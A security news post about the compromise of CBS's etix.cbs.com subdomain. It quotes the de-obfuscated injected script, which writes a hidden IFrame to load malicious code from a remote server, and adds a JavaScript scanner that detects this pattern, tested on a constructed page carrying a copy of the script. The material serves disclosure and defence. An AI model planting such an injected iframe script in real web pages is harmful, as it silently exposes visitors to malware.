CBS.com Subdomain Compromised, Installing Malware On Visitors' PCs
Once again a legitimate website has been infected with malicious obfuscated code; this time it was CBS.com. It seems popular sites with very high traffic remain a favorite and highly effective attack vector for hackers.
Today Finjan revealed that etix.cbs.com, a subdomain of the famous radio and television network, was compromised as a result of malicious activity. The cybercriminals added a malicious obfuscated script to the infected page. The injected script added a malicious IFrame to the page.
The injected IFrame automatically loads another malicious script from a remote server controlled by criminals in Russia, causing a possible installation of malware on the unsuspecting client machine.
De-obfuscated script code from cbs.com sub-domain:
<SCRIPT> window.status='Done'; document.write("<iframe name=29dee5c6 src='http://[REMOVED]/.if/go.html?" +Math.round(Math.random()*257224)+"3e78' width=632 height=407 style='display: none'></iframe>") </SCRIPT>
The malicious Russian server from which the IFrame pulled the malicious code is located in Saint Petersburg and hosted by “ZAO National Telecomunications ISP”.
Finjan immediately informed CBS.com of the infection, and the remote Russian server is currently down.
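For site owners who want to check their own pages for this pattern, here is a heuristic scan of page source for a script that writes a hidden IFrame pointing at another host, the traits visible in the de-obfuscated snippet quoted above. It is an added example, not code from Finjan or the original post; the function name `scanHtml`, the indicator names, the sample pages and the placeholder host `cdn.example.invalid` are all assumptions.

```javascript
// Added example: heuristic scan of page source for script-written hidden iframes.
// Sample pages are constructed; cdn.example.invalid is a placeholder host.
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const SRC_HOST_RE = /src\s*=\s*\\?['"]?\s*(?:https?:)?\/\/([^\/'"\s?\\]+)/i;

// Each indicator is one trait of the de-obfuscated snippet.
const INDICATORS = {
  writesIframe: /document\.write(?:ln)?\s*\([\s\S]*?<iframe\b/i,
  hiddenStyle: /display\s*:\s*none|visibility\s*:\s*hidden/i,
  remoteSrc: SRC_HOST_RE,
  randomQuery: /Math\.random\s*\(/,   // random value appended to the URL
  statusSpoof: /window\.status\s*=/,  // overwrites the status bar text
};
// A script is flagged only when it writes an iframe that is hidden and remote.
const REQUIRED = ["writesIframe", "hiddenStyle", "remoteSrc"];

function scanHtml(html, pageHost) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const body = m[1];
    const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(body));
    if (!REQUIRED.every((k) => hits.includes(k))) continue;
    const host = body.match(SRC_HOST_RE)[1].toLowerCase();
    if (host === pageHost.toLowerCase()) continue; // same-host frame: not this pattern
    findings.push({ offset: m.index, host, hits });
  }
  return findings;
}

// Constructed page carrying a script shaped like the one in the article.
const INFECTED = `<html><body><h1>Tickets</h1>
<SCRIPT> window.status='Done'; document.write("<iframe name=x src='http://cdn.example.invalid/.if/go.html?" + Math.round(Math.random()*257224) + "3e78' width=632 height=407 style='display: none'></iframe>") </SCRIPT>
</body></html>`;

// Constructed benign page: document.write without an iframe, plus a visible frame.
const CLEAN = `<html><body>
<script>document.write("<p>Updated " + new Date().getFullYear() + "</p>");</script>
<iframe src="/player.html" width="632" height="407"></iframe>
</body></html>`;

console.log(JSON.stringify(scanHtml(INFECTED, "etix.cbs.com"), null, 2));
console.log("clean findings:", scanHtml(CLEAN, "etix.cbs.com").length);
```

The patterns match the de-obfuscated form only; the script as served was obfuscated, so scanning raw page source would also need a de-obfuscation or rendering step in front of this check.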